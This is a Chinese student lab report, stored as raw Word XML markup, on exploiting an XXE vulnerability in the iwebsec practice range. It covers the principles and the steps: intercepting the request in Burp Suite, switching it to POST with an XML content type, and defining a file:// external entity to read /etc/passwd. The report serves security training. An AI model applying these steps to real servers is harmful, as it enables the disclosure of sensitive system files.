                <wp:effectExtent l="0" t="0" r="36195" b="1905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885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1.35pt;margin-top:7.85pt;height:0pt;width:478.65pt;z-index:251660288;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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ehuhG2QAA&#10;AAgBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAoLKg&#10;6eQBAAC0AwAADgAAAAAAAAABACAAAAAoAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAA&#10;fgUAAAAA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黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验（实训）目的和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D91CEA" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>实训目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58370430" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>）掌握</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>语言基础结构、</w:t>
      </w:r>
      <w:r>
        <w:t>DTD</w:t>
      </w:r>
      <w:r>
        <w:t>约束、实体解析核心原理，理解</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>数据传输的底层机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A894B5" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>）深入理解</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>外部实体注入）漏洞的产生原理、触发条件及安全风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5DB37A" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>）掌握</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求的底层差异，明确</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞仅可通过</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求利用的核心原因。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB3359" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>）熟练使用</w:t>
      </w:r>
      <w:r>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:t>工具完成抓包、改包、请求方法修改、添加请求头、植入恶意</w:t>
      </w:r>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t>等实操操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CADC9FA" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>）掌握</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞读取服务器本地敏感文件的利用方法，具备基础的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>代码安全审计能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322A6432" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>）了解</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>接口</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的交互逻辑，掌握此类接口的安全审计要点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F52AD0E" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>实训任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C5B23A" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>）搭建实验环境，完成靶机连接与基础</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文件测试，验证</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>解析器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>实体解析特性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58532121" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>）审计</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞核心源码，分析代码存在的安全缺陷与漏洞触发条件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082AC276" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>）通过</w:t>
      </w:r>
      <w:r>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:t>抓包改包，将</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求修改为</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求，构造恶意</w:t>
      </w:r>
      <w:r>
        <w:t>XML Payload</w:t>
      </w:r>
      <w:r>
        <w:t>利用漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B72E9AE" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>）成功读取靶机服务器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/passwd </w:t>
      </w:r>
      <w:r>
        <w:t>敏感文件，完成漏洞验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327B969F" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>）总结</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞风险、接口交互安全要点及对应的安全审计规范。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E2681" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43"/>
    <w:p w14:paraId="33280D6A" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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实验（实训）内容及原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22975A3A" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>核心实验内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236D17D2" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>本次实训基于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>漏洞靶场，以</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞为核心，完成</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>基础认知、漏洞源码审计、</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求差异分析、漏洞手工利用全套实验。首先通过静态</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文件测试，验证靶机</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>解析器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>默认开启实体解析的特性；其次审计漏洞页面</w:t>
      </w:r>
      <w:r>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t>源码，定位高危代码缺陷；最后利用</w:t>
      </w:r>
      <w:r>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:t>篡改</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求，通过</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>方式提交恶意</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>数据，读取服务器本地敏感文件，验证</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>高危漏洞危害。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B37A856" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>核心原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1141A4F1" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>核心原理：</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>是结构化数据传输格式，由</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>声明、</w:t>
      </w:r>
      <w:r>
        <w:t>DTD</w:t>
      </w:r>
      <w:r>
        <w:t>文档约束、元素节点组成，支持内部实体与外部实体定义。外部实体可调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file://</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">http:// </w:t>
      </w:r>
      <w:r>
        <w:t>等协议读取本地文件、请求外网资源，是</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞的核心基础。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E615FC9" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞原理：</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用接收用户可控的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>数据，服务器</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>解析器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>默认开启外部实体解析，且无关键字过滤、无安全拦截，攻击者可构造带恶意外部实体的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>代码，利用服务器解析权限读取本地敏感文件、探测内网服务，造成信息泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A45845" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求原理：</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求无请求体、存在长度限制，无法承载大段恶意</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>代码；</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求支持请求体传参、无严格长度限制，且漏洞</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>源码仅</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求体数据（</w:t>
      </w:r>
      <w:r>
        <w:t>php://input</w:t>
      </w:r>
      <w:r>
        <w:t>），因此</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞仅能通过</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB1605" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>）接口交互原理：</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>类型接口通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Content-Type: application/xml </w:t>
      </w:r>
      <w:r>
        <w:t>标识数据格式，服务端识别格式后调用</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>解析器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>解析数据，未做安全加固的接口会直接解析恶意实体，触发漏洞攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E8BE8B" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43"/>
    <w:p w14:paraId="19E2B6BC" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实验（实训）步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298914C7" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>：实验环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEEDEE7" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>确认实验环境：攻击机</w:t>
      </w:r>
      <w:r>
        <w:t>Kali IP</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.44.129</w:t>
      </w:r>
      <w:r>
        <w:t>，靶机</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.44.128</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E9F7C6" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>2. Kali</w:t>
      </w:r>
      <w:r>
        <w:t>终端通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>连接靶机，登录账号密码为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，进入靶场</w:t>
      </w:r>
      <w:r>
        <w:t>Docker</w:t>
      </w:r>
      <w:r>
        <w:t>容器及网站根目录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /var/www/html</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D30EB8" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:t>工具，配置浏览器代理为</w:t>
      </w:r>
      <w:r>
        <w:t>127.0.0.1:8080</w:t>
      </w:r>
      <w:r>
        <w:t>，开启请求拦截功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E86DA1" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>基础特性测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C28997" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>在网站根目录创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test_xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>文件夹，新建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> book.xml </w:t>
      </w:r>
      <w:r>
        <w:t>测试文件，编写</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>带内部</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>实体的标准</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42252000" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> http://192.168.44.128/test_xxe/book.xml</w:t>
      </w:r>
      <w:r>
        <w:t>，观察实体解析效果，验证</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>解析器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>默认开启实体解析功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2549780B" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>：漏洞源码安全审计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8F0D59" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>查看漏洞页面</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>源码，定位核心高危代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FFD086" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>分析代码缺陷：代码开启外部实体加载、直接接收用户可控</w:t>
      </w:r>
      <w:r>
        <w:t>POST XML</w:t>
      </w:r>
      <w:r>
        <w:t>数据、无任何过滤拦截、直接输出解析结果，完全满足</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞触发条件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EF5935" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:r>
        <w:t>抓包改包准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493E0664" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>访问漏洞地址</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> http://192.168.44.128/xxe/index.php</w:t>
      </w:r>
      <w:r>
        <w:t>，请求被</w:t>
      </w:r>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:r>
        <w:t>拦截。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8816BF" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>将原始</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求手动修改为</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求，在请求头末尾添加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Content-Type: application/xml </w:t>
      </w:r>
      <w:r>
        <w:t>标识</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>数据格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDD9738" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>清空默认空白请求体，预留请求体编辑区域，保证请求头与请求体之间存在空行分隔。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FF26AB" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>：植入恶意</w:t>
      </w:r>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t>并利用漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587B5A77" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求体中粘贴</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞攻击</w:t>
      </w:r>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t>，通过</w:t>
      </w:r>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:t>协议定义外部实体读取服务器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/passwd </w:t>
      </w:r>
      <w:r>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A7A40" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>点击</w:t>
      </w:r>
      <w:r>
        <w:t>Burp Forward</w:t>
      </w:r>
      <w:r>
        <w:t>放行请求，服务端解析恶意</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>数据，执行文件读取操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374095C2" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>查看浏览器响应结果，获取服务器系统用户信息，完成漏洞利用验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BE0945" w14:textId="25D75E30" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（全过程截图）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52451A6C" w14:textId="364213EC" w:rsidR="00463664" w:rsidRDefault="00463664">
      <w:r w:rsidRPr="00463664">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3003AEAC" wp14:editId="03A7239D">
            <wp:extent cx="5616575" cy="2924175"/>
            <wp:effectExtent l="0" t="0" r="317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657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980C9" w14:textId="77777777" w:rsidR="00463664" w:rsidRDefault="00463664"/>
    <w:p w14:paraId="489E7FF8" w14:textId="1FBEF60D" w:rsidR="00463664" w:rsidRDefault="00463664">
      <w:r w:rsidRPr="00463664">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BF21248" wp14:editId="53253EA3">
            <wp:extent cx="5616575" cy="2943860"/>
            <wp:effectExtent l="0" t="0" r="3175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6575" cy="294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CE217" w14:textId="4184064D" w:rsidR="00463664" w:rsidRDefault="00463664">
      <w:r w:rsidRPr="00463664">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
